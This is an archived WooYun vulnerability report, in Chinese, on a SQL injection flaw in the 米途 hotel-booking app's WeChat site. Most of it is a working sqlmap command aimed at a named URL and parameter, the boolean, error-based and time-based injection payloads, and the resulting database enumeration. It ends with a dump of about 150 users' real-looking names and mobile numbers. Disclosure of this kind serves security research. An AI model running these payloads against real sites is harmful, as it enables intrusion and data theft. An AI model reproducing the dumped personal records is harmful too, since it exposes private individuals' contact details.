乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-22: 厂商已经主动忽略漏洞,细节向公众公开
米途APP是北京米天下科技有限公司旗下产品之一,是一款充满人情味的线上订房平台,至今共入驻近4000家客栈等特色住宿。
地址:http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0
python sqlmap.py -u "http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0" --random-agent -p innid --technique=BET --batch -D weikezhan -T qy_users -C id,mobile,nickname,email,qyuserid --dump --threads=10
---Parameter: innid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0---back-end DBMS: MySQL 5.0current user: 'weikezhan@%'current user is DBA: Falsedatabase management system users [1]:[*] 'weikezhan'@'%'
back-end DBMS: MySQL 5.0available databases [3]:[*] information_schema[*] test[*] weikezhansqlmap resumed the following injection point(s) from stored session:---Parameter: innid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0---back-end DBMS: MySQL 5.0Database: weikezhan[35 tables]+-------------------+| cashier_notifies || cashier_oneqr || cashier_partners || cashier_pays || cashier_qrcodes || cashier_slips || qy_user_actions || qy_users || wkz_like || wx_batch_bills || wx_batches || wx_bills || wx_inns || wx_like || wx_log || wx_mailqueue || wx_messages || wx_order_notifies || wx_orderremark || wx_orders || wx_pays || wx_pv_histories || wx_pvs || wx_qrcodes || wx_refunds || wx_scan_history || wx_session || wx_smsmt || wx_systemlogs || wx_templatemsgs || wx_tousu || wx_users || wx_users_vv || wx_warns || yzg_push |+-------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: innid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0---back-end DBMS: MySQL 5.0Database: weikezhanTable: wx_users[16 columns]+----------------+------------------+| Column | Type |+----------------+------------------+| language | varchar(20) || avatarurl | varchar(256) || city | varchar(32) || country | varchar(32) || firstfollowon | datetime || followstatus | smallint(4) || id | int(11) unsigned || lastfollowon | datetime || lastsyncon | datetime || lastunfollowon | datetime || nickname | varchar(32) || openid | varchar(32) || province | varchar(32) || sex | smallint(4) || subscribetime | int(11) || userfrom | varchar(10) |+----------------+------------------+
Database: weikezhanTable: qy_users[10 columns]+---------------+------------------+| Column | Type |+---------------+------------------+| avatarurl | varchar(256) || email | varchar(128) || extattr | varchar(256) || firstfollowon | datetime || followstatus | smallint(4) || id | int(11) unsigned || mobile | varchar(16) || nickname | varchar(32) || openid | varchar(32) || qyuserid | varchar(32) |+---------------+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: innid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0---back-end DBMS: MySQL 5.0Database: weikezhan+----------+---------+| Table | Entries |+----------+---------+| qy_users | 158 |+----------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: innid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (SELECT) Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0---back-end DBMS: MySQL 5.0Database: weikezhanTable: qy_users[158 entries]+------+-------------+----------+-------------------------+-------------------------+| id | mobile | nickname | email | qyuserid |+------+-------------+----------+-------------------------+-------------------------+| 876 | 13641116360 | 刘超 | [email protected] | [email protected] || 877 | 18611586810 | 耿培江 | [email protected] | [email protected] || 878 | 13529926101 | 陈晓玲 | [email protected] | [email protected] || 879 | 15273725707 | 谢妹灵 | [email protected] | [email protected] || 880 | 18200120296 | 陈秀 | [email protected] | [email protected] || 881 | 18306420667 | 钱文凯 | [email protected] | [email protected] || 882 | 18782249534 | 邹莉 | [email protected] | [email protected] || 883 | 15881052405 | 陶敏 | [email protected] | [email protected] || 884 | 18215606651 | 王秋月 | [email protected] | [email protected] || 885 | 18629667052 | 王磊 | [email protected] | [email protected] || 886 | 18215600309 | 黄熙 | [email protected] | [email protected] || 887 | 18787637810 | 黄文诗 | [email protected] | [email protected] || 888 | 18887891568 | 邓正秋 | [email protected] | [email protected] || 889 | 18963989645 | 曹丹 | [email protected] | [email protected] || 890 | 13554677029 | 徐春霞 | [email protected] | [email protected] || 891 | 18213103845 | 毛维才 | [email protected] | [email protected] || 892 | 18782950357 | 陈仕怡 | [email protected] | [email protected] || 893 | 15577223377 | 张云 | [email protected] | [email protected] || 894 | 18230507224 | 殷凤 | [email protected] | [email protected] || 895 | 18200279722 | 杨岩岩 | [email protected] | [email protected] || 896 | 18200273898 | 胡益民 | [email protected] | [email protected] || 897 | 18610632654 | 林薛 | [email protected] | [email protected] || 898 | 13560492524 | 李舒婷 | [email protected] | [email protected] || 899 | 18354280596 | 杨宗敏 | [email protected] | [email protected] || 900 | 18363671268 | 谭雪 | [email protected] | [email protected] || 901 | 13647735778 | 陆莹 | [email protected] | [email protected] || 902 | 18908621307 | 原捷 | [email protected] | [email protected] || 903 | 15273725600 | 龙丹 | [email protected] | [email protected] || 904 | 18780035561 | 江艺梅 | [email protected] | [email protected] || 905 | 13554445953 | 彭梦迪 | [email protected] | [email protected] || 906 | 18520756091 | 赵炎宁 | [email protected] | [email protected] || 907 | 13481386606 | 孙佳恒 | [email protected] | [email protected] || 908 | 13808204023 | 黄露 | [email protected] | [email protected] || 909 | 15198650509 | 钱茜 | [email protected] | [email protected] || 910 | 13599278271 | 丁猛猛 | [email protected] | [email protected] || 911 | 18687990412 | 姚晴文 | [email protected] | [email protected] || 912 | 18215561331 | 任欣雨 | [email protected] | [email protected] || 913 | 18388821643 | 徐辰辰 | [email protected] | [email protected] || 914 | 15607108183 | 黄伟强 | [email protected] | [email protected] || 915 | 18501232514 | 刘建勋 | [email protected] | [email protected] || 916 | 13170411981 | 马伟 | [email protected] | [email protected] || 917 | 15878393705 | 代颖 | [email protected] | [email protected] || 918 | 18687950608 | 许传阳 | [email protected] | [email protected] || 919 | 18782949786 | 赵阳 | [email protected] | [email protected] || 920 | 18931867639 | 褚晓璇 | [email protected] | [email protected] || 921 | 15977382584 | 李春 | [email protected] | [email protected] || 922 | 18650165205 | 刘帅超 | [email protected] | [email protected] || 923 | 18608721662 | 万仕昆 | [email protected] | [email protected] || 924 | 13129957498 | 肖慧泉 | [email protected] | [email protected] || 925 | 18787639461 | 马敏 | [email protected] | [email protected] || 926 | 18087598788 | 钱韦菡 | [email protected] | [email protected] || 927 | 13210232210 | 孙吉强 | [email protected] | [email protected] || 928 | 13145439193 | 杨春晓 | [email protected] | [email protected] || 929 | 18608020947 | 张思超 | [email protected] | [email protected] || 930 | 15910826279 | 闫福宽 | [email protected] | [email protected] || 931 | 18200116261 | 任青青 | [email protected] | [email protected] || 932 | 18687991808 | 田野 | [email protected] | [email protected] || 933 | 18573414977 | 曹宇 | [email protected] | [email protected] || 934 | 13476269336 | 李新 | [email protected] | [email protected] || 935 | 18108087118 | 王莉平 | [email protected] | [email protected] || 936 | 15266223978 | 孙兵兵 | [email protected] | [email protected] || 937 | 18289531510 | 党鹏辉 | [email protected] | [email protected] || 938 | 18515666418 | 聂源莹 | [email protected] | [email protected] || 939 | 15693889008 | 杨霄 | [email protected] | [email protected] || 940 | 18290025006 | 肖桢 | [email protected] | [email protected] || 941 | 13751725334 | 张晓文 | [email protected] | [email protected] || 942 | 0976659575 | 楊佳蓉 | [email protected] | [email protected] || 943 | 18707738834 | 杨昕妮 | [email protected] | [email protected] || 944 | 18707738451 | 王重阳 | [email protected] | [email protected] || 945 | 15607737287 | 张金荣 | [email protected] | [email protected] || 946 | 18354225528 | 李娟 | [email protected] | [email protected] || 947 | 18618266362 | 廉伟 | [email protected] | [email protected] || 948 | 18623377663 | 韩华越 | [email protected] | [email protected] || 949 | 18687996650 | 罗欣琳 | [email protected] | [email protected] || 950 | 18513287139 | 张现会 | [email protected] | [email protected] || 951 | 15610053723 | 李浩 | [email protected] | [email protected] || 952 | 13012949321 | 刘恩泽 | [email protected] | [email protected] || 953 | 15230650300 | 孙延琦 | [email protected] | [email protected] || 954 | <blank> | <blank> | <blank> | <blank> || 955 | 13811282421 | 张晓铮 | [email protected] | [email protected] || 956 | <blank> | <blank> | <blank> | <blank> || 957 | 18501307720 | 赖洪波 | [email protected] | [email protected] || 958 | 18611672157 | 栾丽丽 | [email protected] | [email protected] || 959 | 17708121889 | 何洋 | [email protected] | [email protected] || 960 | <blank> | <blank> | <blank> | <blank> || 961 | 15878356277 | 陈小禹 | [email protected] | [email protected] || 962 | 13688311396 | 罗杰 | [email protected] | [email protected] || 963 | 18200120655 | 向祯 | [email protected] | [email protected] || 964 | 13548199265 | 罗婷 | [email protected] | [email protected] || 965 | 18954221221 | 李克宝 | [email protected] | [email protected] || 966 | 930171920 | 蔡怡庭 | [email protected] | [email protected] || 967 | 920737958 | 陳柏霖 | [email protected] | [email protected] || 968 | <blank> | <blank> | <blank> | <blank> || 969 | <blank> | <blank> | <blank> | <blank> || 970 | 18680309769 | 李伟 | [email protected] | [email protected] || 971 | 15810905235 | 刘钊 | [email protected] | [email protected] || 972 | 13901179861 | 卢怀宇 | [email protected] | [email protected] || 973 | <blank> | <blank> | <blank> | <blank> || 974 | 15811140634 | 李扬 | [email protected] | [email protected] || 975 | 18601254937 | 火龙 | [email protected] | [email protected] || 976 | 18359141466 | 刘秋灵 | [email protected] | [email protected] || 977 | 13331609610 | 林纯 | [email protected] | [email protected] || 978 | 18660016101 | 王小家 | [email protected] | [email protected] || 979 | 13523525700 | 李佩轩 | [email protected] | [email protected] || 980 | 13070879659 | 肖慧 | [email protected] | [email protected] || 981 | 15292085915 | 李翔 | [email protected] | [email protected] || 982 | 18816937896 | 舒凡思 | [email protected] | [email protected] || 983 | 0982729792 | 黃玉萍 | [email protected] | [email protected] || 984 | 18602130755 | 方敏 | [email protected] | [email protected] || 985 | 18565862889 | 夏跃女 | [email protected] | [email protected] || 986 | 13359245975 | 梁茜 | [email protected] | [email protected] || 987 | 18234088207 | 孙琳 | [email protected] | [email protected] || 988 | 18235139762 | 翟敏飞 | [email protected] | [email protected] || 989 | 13554681806 | 殷志鹏 | [email protected] | [email protected] || 990 | 18963988442 | 王宇轩 | [email protected] | [email protected] || 991 | 13986141568 | 裴蕾 | [email protected] | [email protected] || 992 | 13554250605 | 周艺伟 | [email protected] | [email protected] || 993 | 13554358674 | 杨羽寒 | [email protected] | [email protected] || 994 | 18354287358 | 邓楠 | [email protected] | [email protected] || 995 | 18671632928 | 吴永利 | [email protected] | [email protected] || 996 | 15129823419 | 曹楠 | [email protected] | [email protected] || 997 | 13163271522 | 程佳丽 | [email protected] | [email protected] || 998 | 18354298152 | 魏靖 | [email protected] | [email protected] || 999 | 15158112156 | 陈奕冰 | [email protected] | [email protected] || 1000 | 18086507227 | 黄晓琴 | [email protected] | [email protected] || 1001 | 18681337617 | 滑燕莲 | [email protected] | [email protected] || 1002 | 15527373536 | 文长佳 | [email protected] | [email protected] || 1003 | 18627782095 | 姚翔 | [email protected] | [email protected] || 1004 | 18963993543 | 何盼盼 | [email protected] | [email protected] || 1005 | 18710840785 | 陈静 | [email protected] | [email protected] || 1006 | 18798004578 | 刘科廷 | [email protected] | [email protected] || 1007 | 18883868582 | 陈玲 | [email protected] | [email protected] || 1008 | 13458672709 | 杨阳 | [email protected] | [email protected] || 1009 | 15827269951 | 代妙妮 | [email protected] | [email protected] || 1010 | 18963995740 | 涂加文 | [email protected] | [email protected] || 1011 | 18289769162 | 宗新程 | [email protected] | [email protected] || 1012 | 18850165897 | 武俊杰 | [email protected] | [email protected] || 1013 | 18065745849 | 谢立颖 | [email protected] | [email protected] || 1014 | 18159244573 | 何宝 | [email protected] | [email protected] || 1015 | 15501968015 | 王静 | [email protected] | [email protected] || 1016 | 18910387235 | 刘文娟 | [email protected] | [email protected] || 1017 | 18907578440 | 穆倩男 | [email protected] | [email protected] || 1018 | <blank> | 邱艺轩 | [email protected] | [email protected] || 1019 | 13216169656 | 郑攀峰 | [email protected] | [email protected] || 1020 | 18570500716 | 韩宇 | [email protected] | [email protected] || 1021 | 18290169294 | 钟皓程 | [email protected] | [email protected] || 1022 | 17706519770 | 曾怡昕 | <blank> | [email protected] || 1023 | 13096383591 | 周勇 | [email protected] | [email protected] || 1024 | 18234127193 | 邢军 | [email protected] | [email protected] || 1025 | 13678089469 | 王斯蕙 | [email protected] | [email protected] || 1026 | 15527104425 | 邱月 | [email protected] | [email protected] || 1027 | 18200293717 | 陈彦伶 | [email protected] | [email protected] || 1028 | 18392059876 | 王一珍 | [email protected] | [email protected] || 1029 | 17608136880 | 王逸冉 | [email protected] | [email protected] || 1030 | 13630287953 | 弓茹月 | [email protected] | [email protected] || 1031 | 18600206604 | 焦玉龙 | [email protected] | [email protected] || 1032 | 18681654205 | 陈祥 | [email protected] | [email protected] || 1033 | 15011395180 | 李逸伦 | [email protected] | [email protected] |+------+-------------+----------+-------------------------+-------------------------+
过滤一下。
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)